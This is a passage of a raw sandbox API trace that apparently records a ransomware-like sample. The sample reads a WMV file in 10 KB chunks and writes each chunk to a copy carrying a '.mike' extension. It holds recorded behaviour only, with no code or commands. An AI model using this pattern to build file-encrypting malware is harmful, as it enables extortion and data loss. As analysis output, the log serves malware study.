lpOverlapped=0x0 | out: lpBuffer=0x2149f18*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.135] CloseHandle (hObject=0x288) returned 1 [0064.176] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.176] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.176] GetFileType (hFile=0x288) returned 0x1 [0064.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.176] GetFileType (hFile=0x288) returned 0x1 [0064.176] SetFilePointer (in: hFile=0x288, lDistanceToMove=2918400, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2c8800 [0064.176] ReadFile (in: hFile=0x288, lpBuffer=0x214c9e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x214c9e0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.177] CloseHandle (hObject=0x288) returned 1 [0064.177] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.177] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.178] GetFileType (hFile=0x288) returned 0x1 [0064.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.178] GetFileType (hFile=0x288) returned 0x1 [0064.178] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2c8a20 [0064.178] WriteFile (in: hFile=0x288, lpBuffer=0x2156f48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2156f48*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.178] CloseHandle (hObject=0x288) returned 1 [0064.219] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.219] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.220] GetFileType (hFile=0x288) returned 0x1 [0064.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.220] GetFileType (hFile=0x288) returned 0x1 [0064.220] SetFilePointer (in: hFile=0x288, lDistanceToMove=2928640, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2cb000 [0064.220] ReadFile (in: hFile=0x288, lpBuffer=0x2159a10, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2159a10*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.221] CloseHandle (hObject=0x288) returned 1 [0064.221] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.221] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.221] GetFileType (hFile=0x288) returned 0x1 [0064.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.221] GetFileType (hFile=0x288) returned 0x1 [0064.221] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2cb220 [0064.221] WriteFile (in: hFile=0x288, lpBuffer=0x2163f78*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2163f78*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.222] CloseHandle (hObject=0x288) returned 1 [0064.261] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.261] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.262] GetFileType (hFile=0x288) returned 0x1 [0064.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.262] GetFileType (hFile=0x288) returned 0x1 [0064.262] SetFilePointer (in: hFile=0x288, lDistanceToMove=2938880, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2cd800 [0064.262] ReadFile (in: hFile=0x288, lpBuffer=0x2166a40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2166a40*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.263] CloseHandle (hObject=0x288) returned 1 [0064.263] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.263] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.263] GetFileType (hFile=0x288) returned 0x1 [0064.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.263] GetFileType (hFile=0x288) returned 0x1 [0064.263] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2cda20 [0064.263] WriteFile (in: hFile=0x288, lpBuffer=0x2170fa8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2170fa8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.264] CloseHandle (hObject=0x288) returned 1 [0064.303] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.304] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.304] GetFileType (hFile=0x288) returned 0x1 [0064.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.304] GetFileType (hFile=0x288) returned 0x1 [0064.304] SetFilePointer (in: hFile=0x288, lDistanceToMove=2949120, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2d0000 [0064.304] ReadFile (in: hFile=0x288, lpBuffer=0x2173a70, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2173a70*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.305] CloseHandle (hObject=0x288) returned 1 [0064.305] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.305] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.305] GetFileType (hFile=0x288) returned 0x1 [0064.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.306] GetFileType (hFile=0x288) returned 0x1 [0064.306] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2d0220 [0064.306] WriteFile (in: hFile=0x288, lpBuffer=0x217dfd8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x217dfd8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.306] CloseHandle (hObject=0x288) returned 1 [0064.346] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.346] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.346] GetFileType (hFile=0x288) returned 0x1 [0064.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.346] GetFileType (hFile=0x288) returned 0x1 [0064.347] SetFilePointer (in: hFile=0x288, lDistanceToMove=2959360, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2d2800 [0064.347] ReadFile (in: hFile=0x288, lpBuffer=0x2180aa0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2180aa0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.347] CloseHandle (hObject=0x288) returned 1 [0064.348] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.348] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.348] GetFileType (hFile=0x288) returned 0x1 [0064.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.348] GetFileType (hFile=0x288) returned 0x1 [0064.348] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2d2a20 [0064.348] WriteFile (in: hFile=0x288, lpBuffer=0x218b008*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x218b008*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.349] CloseHandle (hObject=0x288) returned 1 [0064.389] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.389] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.389] GetFileType (hFile=0x288) returned 0x1 [0064.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.389] GetFileType (hFile=0x288) returned 0x1 [0064.390] SetFilePointer (in: hFile=0x288, lDistanceToMove=2969600, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2d5000 [0064.390] ReadFile (in: hFile=0x288, lpBuffer=0x218dad0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x218dad0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.390] CloseHandle (hObject=0x288) returned 1 [0064.391] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.391] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.391] GetFileType (hFile=0x288) returned 0x1 [0064.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.391] GetFileType (hFile=0x288) returned 0x1 [0064.391] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2d5220 [0064.391] WriteFile (in: hFile=0x288, lpBuffer=0x2198038*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2198038*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.392] CloseHandle (hObject=0x288) returned 1 [0064.432] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.432] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.433] GetFileType (hFile=0x288) returned 0x1 [0064.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.433] GetFileType (hFile=0x288) returned 0x1 [0064.433] SetFilePointer (in: hFile=0x288, lDistanceToMove=2979840, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2d7800 [0064.433] ReadFile (in: hFile=0x288, lpBuffer=0x219ab00, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x219ab00*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.433] CloseHandle (hObject=0x288) returned 1 [0064.434] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.434] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.434] GetFileType (hFile=0x288) returned 0x1 [0064.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.434] GetFileType (hFile=0x288) returned 0x1 [0064.434] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2d7a20 [0064.434] WriteFile (in: hFile=0x288, lpBuffer=0x21a5068*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21a5068*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.435] CloseHandle (hObject=0x288) returned 1 [0064.474] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.474] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.475] GetFileType (hFile=0x288) returned 0x1 [0064.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.475] GetFileType (hFile=0x288) returned 0x1 [0064.475] SetFilePointer (in: hFile=0x288, lDistanceToMove=2990080, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2da000 [0064.475] ReadFile (in: hFile=0x288, lpBuffer=0x21a7b30, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21a7b30*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.476] CloseHandle (hObject=0x288) returned 1 [0064.477] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.477] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.477] GetFileType (hFile=0x288) returned 0x1 [0064.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.478] GetFileType (hFile=0x288) returned 0x1 [0064.478] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2da220 [0064.478] WriteFile (in: hFile=0x288, lpBuffer=0x21b2098*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x21b2098*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.478] CloseHandle (hObject=0x288) returned 1 [0064.518] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.518] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.518] GetFileType (hFile=0x288) returned 0x1 [0064.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.518] GetFileType (hFile=0x288) returned 0x1 [0064.518] SetFilePointer (in: hFile=0x288, lDistanceToMove=3000320, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2dc800 [0064.518] ReadFile (in: hFile=0x288, lpBuffer=0x21b4b60, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21b4b60*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.519] CloseHandle (hObject=0x288) returned 1 [0064.519] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.519] CreateFileW (lpFileName="C:\\Program Files\\DVD 